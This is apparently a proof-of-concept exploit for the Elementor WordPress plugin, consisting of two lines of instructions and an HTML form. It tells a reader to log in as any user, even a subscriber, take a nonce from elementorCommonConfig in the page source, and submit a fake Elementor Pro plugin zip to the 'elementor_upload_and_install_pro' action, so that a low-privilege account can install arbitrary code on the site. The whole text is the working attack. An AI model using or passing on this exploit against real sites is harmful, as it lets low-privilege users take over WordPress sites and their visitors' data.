To get the nonce, login as any user (such as subscriber) and check the source for elementorCommonConfig. The file to upload should be a fake Elementor Pro plugin zip

<form action="" enctype="multipart/form-data" method="POST">
<input type="text" name="_nonce" value="nonce retrieved from source (check elementorCommonConfig) of the dashboard when logged in as any user">
<input type="file" name="fileToUpload">
<input type="hidden" name="action" value="elementor_upload_and_install_pro">
<input type="submit" value="Submit">